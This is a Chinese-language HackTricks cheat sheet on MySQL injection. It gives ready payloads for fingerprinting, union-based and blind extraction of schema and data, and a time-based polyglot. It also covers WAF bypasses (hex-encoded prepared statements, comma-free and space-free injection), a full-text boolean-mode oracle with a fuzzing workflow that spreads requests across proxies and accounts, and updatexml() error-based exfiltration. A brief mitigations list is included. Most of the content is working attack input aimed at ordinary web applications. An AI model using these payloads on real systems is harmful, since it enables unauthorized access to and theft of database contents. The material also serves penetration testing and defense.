MySQL injection

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

注释

-- MYSQL Comment
# MYSQL Comment
/* MYSQL Comment */
/*! MYSQL Special SQL */
/*!32302 10*/ Comment for MySQL version 3.23.02

有趣的函数

确认 Mysql:

concat('a','b')
database()
version()
user()
system_user()
@@version
@@datadir
rand()
floor(2.9)
length(1)
count(1)

有用的函数

SELECT hex(database())
SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')# Encode() & decpde() returns only numbers
SELECT uncompress(compress(database())) #Compress & uncompress() returns only numbers
SELECT replace(database(),"r","R")
SELECT substr(database(),1,1)='r'
SELECT substring(database(),1,1)=0x72
SELECT ascii(substring(database(),1,1))=114
SELECT database()=char(114,101,120,116,101,115,116,101,114)
SELECT group_concat(<COLUMN>) FROM <TABLE>
SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()

所有 injection

SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"

来自 https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/

流程

记住,在 “现代” 版本的 MySQL 中,你可以将 “information_schema.tables” 替换为 “mysql.innodb_table_stats(这可能有助于绕过 WAFs)。

SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges

只有 1 个值

  • group_concat()
  • Limit X,1

逐个盲注

  • substr(version(),X,1)='r' or substring(version(),X,1)=0x70 or ascii(substr(version(),X,1))=112
  • mid(version(),X,1)='5'

盲注拼接

  • LPAD(version(),1...lenght(version()),'1')='asd'...
  • RPAD(version(),1...lenght(version()),'1')='asd'...
  • SELECT RIGHT(version(),1...lenght(version()))='asd'...
  • SELECT LEFT(version(),1...lenght(version()))='asd'...
  • SELECT INSTR('foobarbar', 'fo...')=1

检测列数

使用一个简单的 ORDER

order by 1
order by 2
order by 3
...
order by XXX

UniOn SeLect 1
UniOn SeLect 1,2
UniOn SeLect 1,2,3
...

MySQL Union Based

UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...

SSRF

在此了解不同选项以 abuse a Mysql injection to obtain a SSRF.

WAF bypass tricks

通过 Prepared Statements 执行查询

当允许 stacked queries 时,可能可以绕过 WAFs:先将要执行的查询的 hex 表示赋值给一个变量(使用 SET),然后使用 PREPARE 和 EXECUTE MySQL 语句来最终执行该查询。类似如下:

0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #

更多信息请参阅 this blog post

Information_schema 替代方案

请记住,在“现代”版本的 MySQL 中,你可以用 information_schema.tables 替代 mysql.innodb_table_statssys.x$schema_flattened_keyssys.schema_table_statistics

MySQLinjection 无逗号

在不使用任何逗号的情况下选择 2 列 (https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma):

-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#

在不知道列名的情况下检索值

如果在某个时候你知道表的名称但不知道表内列的名称,你可以尝试通过执行类似如下的语句来找出表中有多少列:

# When a True is returned, you have found the number of columns
select (select "", "") = (SELECT * from demo limit 1);     # 2columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns

假设有 2 列(第一列为 ID,另一列为 flag),你可以尝试逐字符 bruteforce 来获取 flag 的内容:

# When True, you found the correct char and can start ruteforcing the next position
select (select 1, 'flaf') = (SELECT * from demo limit 1);

More info in https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952

Injection without SPACES (/**/ comment trick)

一些应用使用诸如 sscanf("%128s", buf) 的函数来清理或解析用户输入,这些函数会在第一个空格字符处停止

因为 MySQL 将序列 /**/ 既作为注释 作为空白处理,它可以在保持查询语法有效的同时,用来完全移除 payload 中的普通空格。

下面是一个 time-based blind injection 示例,用于绕过空格过滤:

GET /api/fabric/device/status HTTP/1.1
Authorization: Bearer AAAAAA'/**/OR/**/SLEEP(5)--/**/-'

数据库接收的内容为:

' OR SLEEP(5)-- -'

这在以下情况下尤其有用:

  • 可控缓冲区大小受限(例如 %128s),空格会提前终止输入。
  • 通过 HTTP headers 或其他字段注入时,常规空格可能被剥除或被用作分隔符。
  • INTO OUTFILE primitives 结合可实现完整的 pre-auth RCE(参见 MySQL File RCE 部分)。

MySQL history

你可以看到 MySQL 在读取表时的其他执行:sys.x$statement_analysis

版本替代s

mysql> select @@innodb_version;
mysql> select @@version;
mysql> select version();

MySQL Full-Text Search (FTS) BOOLEAN MODE operator abuse (WOR)

这不是经典的 SQL injection。当开发者将用户输入传入 MATCH(col) AGAINST('...' IN BOOLEAN MODE) 时,MySQL 会在被引号包裹的字符串内执行一组丰富的布尔搜索运算符。许多 WAF/SAST 规则只关注打断引号,忽略了这一攻击面。

Key points:

  • 运算符在引号内被解析: + (must include), - (must not include), * (trailing wildcard), "..." (exact phrase), () (grouping), </>/~ (weights). 参见 MySQL 文档。
  • 这允许在不跳出字符串字面量的情况下进行存在/不存在和前缀测试,例如 AGAINST('+admin*' IN BOOLEAN MODE) 用于检测任何以 admin 开头的词。
  • 可用于构建 oracles,例如“是否有任意行包含前缀为 X 的词?”并通过前缀扩展枚举隐藏字符串。

Example query built by the backend:

SELECT tid, firstpost
FROM threads
WHERE MATCH(subject) AGAINST('+jack*' IN BOOLEAN MODE);

如果应用程序根据结果集是否为空返回不同的响应(例如,重定向 vs. 错误消息),该行为就会成为一个 Boolean oracle,可用于枚举私有数据,例如隐藏/已删除的标题。

Sanitizer bypass patterns (generic):

  • Boundary-trim preserving wildcard: 如果后端通过正则表达式像 (\b.{1,2})(\s)|(\b.{1,2}$) 这种方式对每个单词裁剪 1–2 个尾随字符,提交 prefix*ZZ。清理器会裁掉 ZZ 但保留 *,因此 prefix* 得以保留。
  • Early-break stripping: 如果代码按单词剥离 operators,但在遇到任意长度 ≥ min length 的 token 时停止处理,就发送两个 token:第一个是满足长度阈值的垃圾 token,第二个携带 operator payload。例如:&&&&& +jack*ZZ → 清理后:+&&&&& +jack*

Payload template (URL-encoded):

keywords=%26%26%26%26%26+%2B{FUZZ}*xD
  • %26 is &, %2B is +. 结尾的 xD(或任意两个字母)会被清理器修剪,保留 {FUZZ}*
  • 将 redirect 视为 “match”,将 error page 视为 “no match”。不要自动跟随 redirects,以保持 oracle 的可观测性。

Enumeration workflow:

  1. {FUZZ} = a…z,0…9 开始,通过 +a*+b* 等找到首字母匹配。
  2. 对每个命中的前缀进行分支:a* → aa* / ab* / …。重复该过程以恢复完整字符串。
  3. 如果应用强制实施 flood control,则分散请求(使用 proxies、多个 accounts)。

为什么 titles often leak while contents don’t:

  • 一些应用仅在对 标题/主题 进行初步 MATCH 之后才应用可见性检查。如果 control-flow 在过滤之前依赖于“是否有结果?”的判断,就会发生 existence leaks。

Mitigations:

  • 如果不需要 Boolean 逻辑,使用 IN NATURAL LANGUAGE MODE 或将用户输入当作字面量处理(escape/quote 会在其他模式下禁用操作符)。
  • 如果需要 Boolean 模式,在分词后对每个 token 去除或中和所有 Boolean 操作符(+ - * " ( ) < > ~)(不得提前中断)。
  • 在 MATCH 之前应用可见性/授权过滤,或在结果集为空与非空时统一响应(恒定的 timing/status)。
  • 检查其他 DBMS 中的类似功能:PostgreSQL to_tsquery/websearch_to_tsquery、SQL Server/Oracle/Db2 的 CONTAINS 也会解析引号内参数中的操作符。

Notes:

  • Prepared statements 并不能防止对 REGEXP 或搜索操作符的语义滥用。像 .* 这样的输入即使放在带引号的 REGEXP '.*' 中,仍然是一个 permissive regex。使用 allow-lists 或明确的 guards。

基于错误的 exfiltration(通过 updatexml()

当应用仅返回 SQL 错误(而非原始结果集)时,你可以通过 MySQL 的错误字符串来 leak 数据:

dimension: id {
type: number
sql: updatexml(null, concat(0x7e, IFNULL((SELECT name FROM project_state LIMIT 1 OFFSET 0), 'NULL'), 0x7e, '///'), null) ;;
}

updatexml() 会触发一个 XPATH 错误,该错误会嵌入拼接后的字符串,因此内部 SELECT 的值会出现在错误响应的分隔符之间(0x7e = ~)。通过迭代 LIMIT 1 OFFSET N 来枚举行。即便 UI 强制使用 “boolean” 测试,该方法仍然有效,因为错误信息仍然会被显示出来。

其他 MYSQL injection 指南

参考

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks